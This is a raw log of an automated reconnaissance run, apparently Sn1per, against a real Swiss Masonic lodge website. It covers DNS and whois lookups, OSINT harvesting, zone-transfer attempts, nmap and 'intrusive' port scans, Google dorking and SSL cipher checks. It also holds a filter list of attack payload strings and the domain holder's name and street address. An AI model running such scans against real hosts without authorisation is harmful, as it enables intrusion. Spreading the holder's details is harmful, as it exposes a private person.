  906. [!] .htaccess shipped with Joomla! is being deployed for SEO purpose
  907. [!] It contains some defensive mod_rewrite rules
  908. [!] Payloads that contain strings (mosConfig,base64_encode,<script>
  909. GLOBALS,_REQUEST) wil be responsed with 403.
  910.  
  911. ====================================================================================
  912.  RUNNING NSLOOKUP 
  913. ====================================================================================
  914. Server: 192.168.1.254
  915. Address: 192.168.1.254#53
  916.  
  917. Non-authoritative answer:
  918. Name: francmaconnerie.ch
  919. Address: 93.88.240.208
  920.  
  921. francmaconnerie.ch has address 93.88.240.208
  922. francmaconnerie.ch mail is handled by 5 mta-gw.infomaniak.ch.
  923. ====================================================================================
  924.  CHECKING OS FINGERPRINT 
  925. ====================================================================================
  926.  
  927. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  928.  
  929. [+] Target is francmaconnerie.ch
  930. [+] Loading modules.
  931. [+] Following modules are loaded:
  932. [x] [1] ping:icmp_ping - ICMP echo discovery module
  933. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  934. [x] [3] ping:udp_ping - UDP-based ping discovery module
  935. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  936. [x] [5] infogather:portscan - TCP and UDP PortScanner
  937. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  938. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  939. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  940. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  941. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  942. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  943. [x] [12] fingerprint:smb - SMB fingerprinting module
  944. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  945. [+] 13 modules registered
  946. [+] Initializing scan engine
  947. [+] Running scan engine
  948. [-] ping:tcp_ping module: no closed/open TCP ports known on 93.88.240.208. Module test failed
  949. [-] ping:udp_ping module: no closed/open UDP ports known on 93.88.240.208. Module test failed
  950. [-] No distance calculation. 93.88.240.208 appears to be dead or no ports known
  951. [+] Host: 93.88.240.208 is down (Guess probability: 0%)
  952. [+] Cleaning up scan engine
  953. [+] Modules deinitialized
  954. [+] Execution completed.
  955. ====================================================================================
  956.  GATHERING WHOIS INFO 
  957. ====================================================================================
  958. whois: This information is subject to an Acceptable Use Policy.
  959. See https://www.nic.ch/terms/aup/
  960.  
  961.  
  962. Domain name:
  963. francmaconnerie.ch
  964.  
  965. Holder of domain name:
  966. constante et avenir
  967. rossier jean-luc
  968. rue des bosquets 33
  969. CH-1800 Vevey
  970. Switzerland
  971.  
  972. Registrar:
  973. Infomaniak Network SA
  974.  
  975. First registration date:
  976. 2002-03-18
  977.  
  978. DNSSEC:N
  979.  
  980. Name servers:
  981. ns5.infomaniak.ch [2001:1600:0:aaaa::e]
  982. ns5.infomaniak.ch [84.16.66.68]
  983. ns6.infomaniak.ch [2001:1600:0:aaaa::f]
  984. ns6.infomaniak.ch [84.16.67.68]
  985. ====================================================================================
  986.  GATHERING OSINT INFO 
  987. ====================================================================================
  988.  
  989. *******************************************************************
  996. * TheHarvester Ver. 2.7 *
  997. * Coded by Christian Martorella *
  998. * Edge-Security Research *
  999. * cmartorella@edge-security.com *
  1000. *******************************************************************
  1001.  
  1002.  
  1003. Full harvest..
  1004. [-] Searching in Google..
  1005. Searching 0 results...
  1006. [-] Searching in PGP Key server..
  1007. [-] Searching in Bing..
  1008. Searching 50 results...
  1009. [-] Searching in Exalead..
  1010. Searching 50 results...
  1011.  
  1012.  
  1013. [+] Emails found:
  1014. ------------------
  1015. info@francmaconnerie.ch
  1016.  
  1017. [+] Hosts found in search engines:
  1018. ------------------------------------
  1019. [-] Resolving hostnames IPs...
  1020. 93.88.240.208:www.francmaconnerie.ch
  1021. [+] Virtual hosts:
  1022. ==================
  1042.  
  1043. ******************************************************
  1049. * Metagoofil Ver 2.2 *
  1050. * Christian Martorella *
  1051. * Edge-Security.com *
  1052. * cmartorella_at_edge-security.com *
  1053. ******************************************************
  1054.  
  1055. [-] Starting online search...
  1056.  
  1057. [-] Searching for doc files, with a limit of 25
  1058. Searching 100 results...
  1059. Results: 0 files found
  1060. Starting to download 25 of them:
  1061. ----------------------------------------
  1062.  
  1063.  
  1064. [-] Searching for pdf files, with a limit of 25
  1065. Searching 100 results...
  1066. Results: 0 files found
  1067. Starting to download 25 of them:
  1068. ----------------------------------------
  1069.  
  1070.  
  1071. [-] Searching for xls files, with a limit of 25
  1072. Searching 100 results...
  1073. Results: 0 files found
  1074. Starting to download 25 of them:
  1075. ----------------------------------------
  1076.  
  1077.  
  1078. [-] Searching for csv files, with a limit of 25
  1079. Searching 100 results...
  1080. Results: 0 files found
  1081. Starting to download 25 of them:
  1082. ----------------------------------------
  1083.  
  1084.  
  1085. [-] Searching for txt files, with a limit of 25
  1086. Searching 100 results...
  1087. Results: 0 files found
  1088. Starting to download 25 of them:
  1089. ----------------------------------------
  1090.  
  1091. processing
  1092. user
  1093. email
  1094.  
  1095. [+] List of users found:
  1096. --------------------------
  1097.  
  1098. [+] List of software found:
  1099. -----------------------------
  1100.  
  1101. [+] List of paths and servers found:
  1102. ---------------------------------------
  1103.  
  1104. [+] List of e-mails found:
  1105. ----------------------------
  1106. ====================================================================================
  1107.  GATHERING DNS INFO 
  1108. ====================================================================================
  1109.  
  1110. ; <<>> DiG 9.11.2-5-Debian <<>> -x francmaconnerie.ch
  1111. ;; global options: +cmd
  1112. ;; Got answer:
  1113. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 13595
  1114. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  1115.  
  1116. ;; OPT PSEUDOSECTION:
  1117. ; EDNS: version: 0, flags:; udp: 4096
  1118. ;; QUESTION SECTION:
  1119. ;ch.francmaconnerie.in-addr.arpa. IN PTR
  1120.  
  1121. ;; AUTHORITY SECTION:
  1122. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102543 1800 900 604800 3600
  1123.  
  1124. ;; Query time: 277 msec
  1125. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  1126. ;; WHEN: Sun Jan 07 18:46:43 EST 2018
  1127. ;; MSG SIZE rcvd: 128
  1128.  
  1129. dnsenum VERSION:1.2.4
  1130. 
  1131. ----- francmaconnerie.ch -----
  1132. 
  1133.  
  1134. Host's addresses:
  1135. __________________
  1136.  
  1137. francmaconnerie.ch. 64749 IN A 93.88.240.208
  1138. 
  1139.  
  1140. Name Servers:
  1141. ______________
  1142.  
  1143. ns5.infomaniak.ch. 69500 IN A 84.16.66.68
  1144. ns6.infomaniak.ch. 69500 IN A 84.16.67.68
  1145. 
  1146.  
  1147. Mail (MX) Servers:
  1148. ___________________
  1149.  
  1150. mta-gw.infomaniak.ch. 3600 IN A 83.166.132.48
  1151. 
  1152.  
  1153. Trying Zone Transfers and getting Bind Versions:
  1154. _________________________________________________
  1155.  
  1156. 
  1157. Trying Zone Transfer for francmaconnerie.ch on ns5.infomaniak.ch ...
  1158.  
  1159. Trying Zone Transfer for francmaconnerie.ch on ns6.infomaniak.ch ...
  1160.  
  1161. brute force file not specified, bay.
  1162. ====================================================================================
  1163.  GATHERING DNS SUBDOMAINS 
  1164. ====================================================================================
  1165. 
  1171.  
  1172. # Coded By Ahmed Aboul-Ela - @aboul3la
  1173.  
  1174. [-] Enumerating subdomains now for francmaconnerie.ch
  1175. [-] verbosity is enabled, will show the subdomains results in realtime
  1176. [-] Searching now in Baidu..
  1177. [-] Searching now in Yahoo..
  1178. [-] Searching now in Google..
  1179. [-] Searching now in Bing..
  1180. [-] Searching now in Ask..
  1181. [-] Searching now in Netcraft..
  1182. [-] Searching now in DNSdumpster..
  1183. [-] Searching now in Virustotal..
  1184. [-] Searching now in ThreatCrowd..
  1185. [-] Searching now in SSL Certificates..
  1186. [-] Searching now in PassiveDNS..
  1187. ThreatCrowd: www.francmaconnerie.ch
  1188. Virustotal: www.francmaconnerie.ch
  1189. Bing: www.francmaconnerie.ch
  1190. Yahoo: www.francmaconnerie.ch
  1191. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-francmaconnerie.ch.txt
  1192. [-] Total Unique Subdomains Found: 1
  1193. www.francmaconnerie.ch
  1194.  
  1195.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  1196.  ║ ╠╦╝ ║ ╚═╗╠═╣
  1197.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  1198. ====================================================================================
  1199.  GATHERING CERTIFICATE SUBDOMAINS 
  1200. ====================================================================================
  1201. 
  1202.  
  1203. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-francmaconnerie.ch-full.txt
  1204. 
  1205. ====================================================================================
  1206.  CHECKING FOR SUBDOMAIN HIJACKING 
  1207. ====================================================================================
  1208. ====================================================================================
  1209.  CHECKING EMAIL SECURITY 
  1210. ====================================================================================
  1211.  
  1212. ====================================================================================
  1213.  STARTING DOMAIN FLYOVER 
  1214. ====================================================================================
  1215. ====================================================================================
  1216.  STARTING PUBLIC S3 BUCKET SCAN 
  1217. ====================================================================================
  1218.  
  1219.  
  1220. ====================================================================================
  1221.  PINGING HOST 
  1222. ====================================================================================
  1223. PING francmaconnerie.ch (93.88.240.208) 56(84) bytes of data.
  1224.  
  1225. --- francmaconnerie.ch ping statistics ---
  1226. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  1227.  
  1228.  
  1229. ====================================================================================
  1230.  RUNNING TCP PORT SCAN 
  1231. ====================================================================================
  1232.  
  1233. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 18:47 EST
  1234. Nmap scan report for francmaconnerie.ch (93.88.240.208)
  1235. Host is up (0.11s latency).
  1236. rDNS record for 93.88.240.208: imu215.infomaniak.ch
  1237. Not shown: 469 filtered ports, 1 closed port
  1238. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1239. PORT STATE SERVICE
  1240. 21/tcp open ftp
  1241. 80/tcp open http
  1242. 443/tcp open https
  1243.  
  1244. Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds
  1245.  
  1246. ====================================================================================
  1247.  RUNNING INTRUSIVE SCANS 
  1248. ====================================================================================
  1249.  + -- --=[Port 21 opened... running tests...
  1250.  
  1251. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 18:47 EST
  1252. Nmap scan report for francmaconnerie.ch (93.88.240.208)
  1253. Host is up (0.11s latency).
  1254. rDNS record for 93.88.240.208: imu215.infomaniak.ch
  1255. Skipping host francmaconnerie.ch (93.88.240.208) due to host timeout
  1256. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1257. Nmap done: 1 IP address (1 host up) scanned in 905.08 seconds
  1258.  + -- --=[Port 22 closed... skipping.
  1259.  + -- --=[Port 23 closed... skipping.
  1260.  + -- --=[Port 25 closed... skipping.
  1261.  + -- --=[Port 53 closed... skipping.
  1262.  + -- --=[Port 79 closed... skipping.
  1263.  + -- --=[Port 80 opened... running tests...
  1264. ====================================================================================
  1265.  CHECKING FOR WAF 
  1266. ====================================================================================
  1267.  
  1275.  
  1276. WAFW00F - Web Application Firewall Detection Tool
  1277.  
  1278. By Sandro Gauci && Wendel G. Henrique
  1279.  
  1280. Checking http://francmaconnerie.ch
  1281.  
  1282. ====================================================================================
  1283.  GATHERING HTTP INFO 
  1284. ====================================================================================
  1285. http://francmaconnerie.ch [ Unassigned]
  1286.  
  1292.  
  1293. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1294. + -- --=[Target: francmaconnerie.ch:80
  1295. + -- --=[Port is closed!
  1296.  
  1297. ====================================================================================
  1298.  CHECKING HTTP HEADERS 
  1299. ====================================================================================
  1300. + -- --=[Checking if X-Content options are enabled on francmaconnerie.ch... 
  1301.  
  1302. + -- --=[Checking if X-Frame options are enabled on francmaconnerie.ch... 
  1303.  
  1304. + -- --=[Checking if X-XSS-Protection header is enabled on francmaconnerie.ch... 
  1305.  
  1306. + -- --=[Checking HTTP methods on francmaconnerie.ch... 
  1307.  
  1308. + -- --=[Checking if TRACE method is enabled on francmaconnerie.ch... 
  1309.  
  1310. + -- --=[Checking for META tags on francmaconnerie.ch... 
  1311.  
  1312. + -- --=[Checking for open proxy on francmaconnerie.ch... 
  1313.  
  1314. + -- --=[Enumerating software on francmaconnerie.ch... 
  1315.  
  1316. + -- --=[Checking if Strict-Transport-Security is enabled on francmaconnerie.ch... 
  1317.  
  1318. + -- --=[Checking for Flash cross-domain policy on francmaconnerie.ch... 
  1319.  
  1320. + -- --=[Checking for Silverlight cross-domain policy on francmaconnerie.ch... 
  1321.  
  1322. + -- --=[Checking for HTML5 cross-origin resource sharing on francmaconnerie.ch... 
  1323.  
  1324. + -- --=[Retrieving robots.txt on francmaconnerie.ch... 
  1325.  
  1326. + -- --=[Retrieving sitemap.xml on francmaconnerie.ch... 
  1327.  
  1328. + -- --=[Checking cookie attributes on francmaconnerie.ch... 
  1329.  
  1330. + -- --=[Checking for ASP.NET Detailed Errors on francmaconnerie.ch... 
  1331.  
  1332. 
  1333. ====================================================================================
  1334.  SAVING SCREENSHOTS 
  1335. ====================================================================================
  1336. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/francmaconnerie.ch-port80.jpg
  1337. ====================================================================================
  1338.  RUNNING GOOGLE HACKING QUERIES 
  1339. ====================================================================================
  1340. ====================================================================================
  1341.  RUNNING INURLBR OSINT QUERIES 
  1342. ====================================================================================
  1343.  
  1351.  
  1352. __[ ! ] Neither war between hackers, nor peace for the system.
  1353. __[ ! ] http://blog.inurl.com.br
  1354. __[ ! ] http://fb.com/InurlBrasil
  1355. __[ ! ] http://twitter.com/@googleinurl
  1356. __[ ! ] http://github.com/googleinurl
  1357. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  1358. __[ ! ] Current script owner::[ root ]
  1359. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  1360. __[ ! ] Current pwd::[ /usr/share/sniper ]
  1361. __[ ! ] Help: php inurlbr.php --help
  1362. ------------------------------------------------------------------------------------------------------------------------
  1363.  
  1364. [ ! ] Starting SCANNER INURLBR 2.1 at [07-01-2018 19:44:41]
  1365. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1366. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1367. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1368.  
  1369. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-francmaconnerie.ch.txt ]
  1370. [ INFO ][ DORK ]::[ site:francmaconnerie.ch ]
  1371. [ INFO ][ SEARCHING ]:: {
  1372. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ve ]
  1373.  
  1374. [ INFO ][ SEARCHING ]:: 
  1375. -[:::]
  1376. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1377.  
  1378. [ INFO ][ SEARCHING ]:: 
  1379. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1380. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.rs ID: 003917828085772992913:gmoeray5sa8 ]
  1381.  
  1382. [ INFO ][ SEARCHING ]:: 
  1383. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1384.  
  1385. [ INFO ][ TOTAL FOUND VALUES ]:: [ 20 ]
  1386.  
  1387. 
  1388.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1389. |_[ + ] [ 0 / 20 ]-[19:44:57] [ - ] 
  1390. |_[ + ] Target:: [ http://www.francmaconnerie.ch/ ]
  1391. |_[ + ] Exploit:: 
  1392. |_[ + ] Information Server:: , , IP::0 
  1393. |_[ + ] More details:: 
  1394. |_[ + ] Found:: UNIDENTIFIED
  1395. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1396. 
  1397.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1398. |_[ + ] [ 1 / 20 ]-[19:45:02] [ - ] 
  1399. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/8 ]
  1400. |_[ + ] Exploit:: 
  1401. |_[ + ] Information Server:: , , IP::0 
  1402. |_[ + ] More details:: 
  1403. |_[ + ] Found:: UNIDENTIFIED
  1404. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1405. 
  1406.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1407. |_[ + ] [ 2 / 20 ]-[19:45:07] [ - ] 
  1408. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/3 ]
  1409. |_[ + ] Exploit:: 
  1410. |_[ + ] Information Server:: , , IP::0 
  1411. |_[ + ] More details:: 
  1412. |_[ + ] Found:: UNIDENTIFIED
  1413. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1414. 
  1415.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1416. |_[ + ] [ 3 / 20 ]-[19:45:12] [ - ] 
  1417. |_[ + ] Target:: [ http://francmaconnerie.ch/node/18 ]
  1418. |_[ + ] Exploit:: 
  1419. |_[ + ] Information Server:: , , IP::0 
  1420. |_[ + ] More details:: 
  1421. |_[ + ] Found:: UNIDENTIFIED
  1422. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1423. 
  1424.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1425. |_[ + ] [ 4 / 20 ]-[19:45:17] [ - ] 
  1426. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/17 ]
  1427. |_[ + ] Exploit:: 
  1428. |_[ + ] Information Server:: , , IP::0 
  1429. |_[ + ] More details:: 
  1430. |_[ + ] Found:: UNIDENTIFIED
  1431. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1432. 
  1433.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1434. |_[ + ] [ 5 / 20 ]-[19:45:22] [ - ] 
  1435. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/19 ]
  1436. |_[ + ] Exploit:: 
  1437. |_[ + ] Information Server:: , , IP::0 
  1438. |_[ + ] More details:: 
  1439. |_[ + ] Found:: UNIDENTIFIED
  1440. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1441. 
  1442.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1443. |_[ + ] [ 6 / 20 ]-[19:45:27] [ - ] 
  1444. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/6 ]
  1445. |_[ + ] Exploit:: 
  1446. |_[ + ] Information Server:: , , IP::0 
  1447. |_[ + ] More details:: 
  1448. |_[ + ] Found:: UNIDENTIFIED
  1449. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1450. 
  1451.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1452. |_[ + ] [ 7 / 20 ]-[19:45:32] [ - ] 
  1453. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/4 ]
  1454. |_[ + ] Exploit:: 
  1455. |_[ + ] Information Server:: , , IP::0 
  1456. |_[ + ] More details:: 
  1457. |_[ + ] Found:: UNIDENTIFIED
  1458. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1459. 
  1460.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1461. |_[ + ] [ 8 / 20 ]-[19:45:37] [ - ] 
  1462. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/13 ]
  1463. |_[ + ] Exploit:: 
  1464. |_[ + ] Information Server:: , , IP::0 
  1465. |_[ + ] More details:: 
  1466. |_[ + ] Found:: UNIDENTIFIED
  1467. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1468. 
  1469.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1470. |_[ + ] [ 9 / 20 ]-[19:45:42] [ - ] 
  1471. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/1 ]
  1472. |_[ + ] Exploit:: 
  1473. |_[ + ] Information Server:: , , IP::0 
  1474. |_[ + ] More details:: 
  1475. |_[ + ] Found:: UNIDENTIFIED
  1476. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1477. 
  1478.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1479. |_[ + ] [ 10 / 20 ]-[19:45:47] [ - ] 
  1480. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/2 ]
  1481. |_[ + ] Exploit:: 
  1482. |_[ + ] Information Server:: , , IP::0 
  1483. |_[ + ] More details:: 
  1484. |_[ + ] Found:: UNIDENTIFIED
  1485. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1486. 
  1487.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1488. |_[ + ] [ 11 / 20 ]-[19:45:52] [ - ] 
  1489. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/7 ]
  1490. |_[ + ] Exploit:: 
  1491. |_[ + ] Information Server:: , , IP::0 
  1492. |_[ + ] More details:: 
  1493. |_[ + ] Found:: UNIDENTIFIED
  1494. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1495. 
  1496.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1497. |_[ + ] [ 12 / 20 ]-[19:45:57] [ - ] 
  1498. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/20 ]
  1499. |_[ + ] Exploit:: 
  1500. |_[ + ] Information Server:: , , IP::0 
  1501. |_[ + ] More details:: 
  1502. |_[ + ] Found:: UNIDENTIFIED
  1503. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1504. 
  1505.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1506. |_[ + ] [ 13 / 20 ]-[19:46:02] [ - ] 
  1507. |_[ + ] Target:: [ http://www.francmaconnerie.ch/node/14 ]
  1508. |_[ + ] Exploit:: 
  1509. |_[ + ] Information Server:: , , IP::0 
  1510. |_[ + ] More details:: 
  1511. |_[ + ] Found:: UNIDENTIFIED
  1512. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1513. 
  1514.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1515. |_[ + ] [ 14 / 20 ]-[19:46:07] [ - ] 
  1516. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Rudyard Kipling_poeme.pdf ]
  1517. |_[ + ] Exploit:: 
  1518. |_[ + ] Information Server:: , , IP::0 
  1519. |_[ + ] More details:: 
  1520. |_[ + ] Found:: UNIDENTIFIED
  1521. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1522. 
  1523.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1524. |_[ + ] [ 15 / 20 ]-[19:46:12] [ - ] 
  1525. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche sur La Mort_0.pdf ]
  1526. |_[ + ] Exploit:: 
  1527. |_[ + ] Information Server:: , , IP::0 
  1528. |_[ + ] More details:: 
  1529. |_[ + ] Found:: UNIDENTIFIED
  1530. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1531. 
  1532.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1533. |_[ + ] [ 16 / 20 ]-[19:46:17] [ - ] 
  1534. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche Etre ou Paraître.pdf ]
  1535. |_[ + ] Exploit:: 
  1536. |_[ + ] Information Server:: , , IP::0 
  1537. |_[ + ] More details:: 
  1538. |_[ + ] Found:: UNIDENTIFIED
  1539. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1540. 
  1541.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1542. |_[ + ] [ 17 / 20 ]-[19:46:22] [ - ] 
  1543. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche sur l invisible_0.pdf ]
  1544. |_[ + ] Exploit:: 
  1545. |_[ + ] Information Server:: , , IP::0 
  1546. |_[ + ] More details:: 
  1547. |_[ + ] Found:: UNIDENTIFIED
  1548. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1549. 
  1550.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1551. |_[ + ] [ 18 / 20 ]-[19:46:27] [ - ] 
  1552. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Planche Orateur sur L'Amour.pdf ]
  1553. |_[ + ] Exploit:: 
  1554. |_[ + ] Information Server:: , , IP::0 
  1555. |_[ + ] More details:: 
  1556. |_[ + ] Found:: UNIDENTIFIED
  1557. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1558. 
  1559.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1560. |_[ + ] [ 19 / 20 ]-[19:46:32] [ - ] 
  1561. |_[ + ] Target:: [ http://www.francmaconnerie.ch/sites/default/files/Orateur à un nouvel initié Fratrie ou Fraternité.pdf ]
  1562. |_[ + ] Exploit:: 
  1563. |_[ + ] Information Server:: , , IP::0 
  1564. |_[ + ] More details:: 
  1565. |_[ + ] Found:: UNIDENTIFIED
  1566. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
  1567.  
  1568. [ INFO ] [ Shutting down ]
  1569. [ INFO ] [ End of process INURLBR at [07-01-2018 19:46:32]
  1570. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1571. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-francmaconnerie.ch.txt ]
  1572. |_________________________________________________________________________________________
  1573.  
  1574. \_________________________________________________________________________________________/
  1575.  
  1576.  + -- --=[Port 110 closed... skipping.
  1577.  + -- --=[Port 111 closed... skipping.
  1578.  + -- --=[Port 135 closed... skipping.
  1579.  + -- --=[Port 139 closed... skipping.
  1580.  + -- --=[Port 161 closed... skipping.
  1581.  + -- --=[Port 162 closed... skipping.
  1582.  + -- --=[Port 389 closed... skipping.
  1583.  + -- --=[Port 443 opened... running tests...
  1584. ====================================================================================
  1585.  CHECKING FOR WAF 
  1586. ====================================================================================
  1587.  
  1595.  
  1596. WAFW00F - Web Application Firewall Detection Tool
  1597.  
  1598. By Sandro Gauci && Wendel G. Henrique
  1599.  
  1600. Checking https://francmaconnerie.ch
  1601.  
  1602. ====================================================================================
  1603.  GATHERING HTTP INFO 
  1604. ====================================================================================
  1605. https://francmaconnerie.ch [ Unassigned]
  1606.  
  1607. ====================================================================================
  1608.  GATHERING SSL/TLS INFO 
  1609. ====================================================================================
  1610.  
  1611.  
  1612.  
  1613. AVAILABLE PLUGINS
  1614. -----------------
  1615.  
  1616. PluginHSTS
  1617. PluginOpenSSLCipherSuites
  1618. PluginCertInfo
  1619. PluginSessionRenegotiation
  1620. PluginCompression
  1621. PluginChromeSha1Deprecation
  1622. PluginSessionResumption
  1623. PluginHeartbleed
  1624.  
  1625.  
  1626.  
  1627. CHECKING HOST(S) AVAILABILITY
  1628. -----------------------------
  1629.  
  1630. francmaconnerie.ch => WARNING: Could not connect (timeout); discarding corresponding tasks.
  1631.  
  1632.  
  1633.  
  1634. SCAN COMPLETED IN 5.03 S
  1635. ------------------------
  1636. Version: 1.11.10-static
  1637. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1638. 
  1639. Testing SSL server francmaconnerie.ch on port 443 using SNI name francmaconnerie.ch
  1640.  
  1641. TLS Fallback SCSV:
  1642. Server does not support TLS Fallback SCSV
  1643.  
  1644. TLS renegotiation:
  1645. Secure session renegotiation supported
  1646.  
  1647. TLS Compression:
  1648. Compression disabled
  1649.  
  1650. Heartbleed:
  1651. TLS 1.2 not vulnerable to heartbleed
  1652. TLS 1.1 not vulnerable to heartbleed
  1653. TLS 1.0 not vulnerable to heartbleed
  1654.  
  1655. Supported Server Cipher(s):
  1656. Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  1657. Accepted TLSv1.0 256 bits AES256-SHA
  1658. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  1659. Accepted TLSv1.0 128 bits AES128-SHA
  1660. Accepted TLSv1.0 128 bits RC4-SHA 
  1661. Accepted TLSv1.0 128 bits RC4-MD5 
  1662. Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA  DHE 1024 bits
  1663. Accepted TLSv1.0 112 bits DES-CBC3-SHA 
  1664. Accepted TLSv1.0 56 bits EDH-RSA-DES-CBC-SHA  DHE 1024 bits
  1665. Accepted TLSv1.0 56 bits DES-CBC-SHA 
  1666. Accepted TLSv1.0 40 bits EXP-EDH-RSA-DES-CBC-SHA  DHE 512 bits
  1667. Accepted TLSv1.0 40 bits EXP-DES-CBC-SHA  RSA 512 bits
  1668. Accepted TLSv1.0 40 bits EXP-RC2-CBC-MD5  RSA 512 bits
  1669. Accepted TLSv1.0 40 bits EXP-RC4-MD5  RSA 512 bits
  1670. Preferred SSLv3 256 bits DHE-RSA-AES256-SHA  DHE 1024 bits
  1671. Accepted SSLv3 256 bits AES256-SHA 
  1672. Accepted SSLv3 128 bits DHE-RSA-AES128-SHA  DHE 1024 bits
  1673. Accepted SSLv3 128 bits AES128-SHA 
  1674. Accepted SSLv3 128 bits RC4-SHA 
  1675. Accepted SSLv3 128 bits RC4-MD5 
  1676. Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA  DHE 1024 bits
  1677. Accepted SSLv3 112 bits DES-CBC3-SHA 
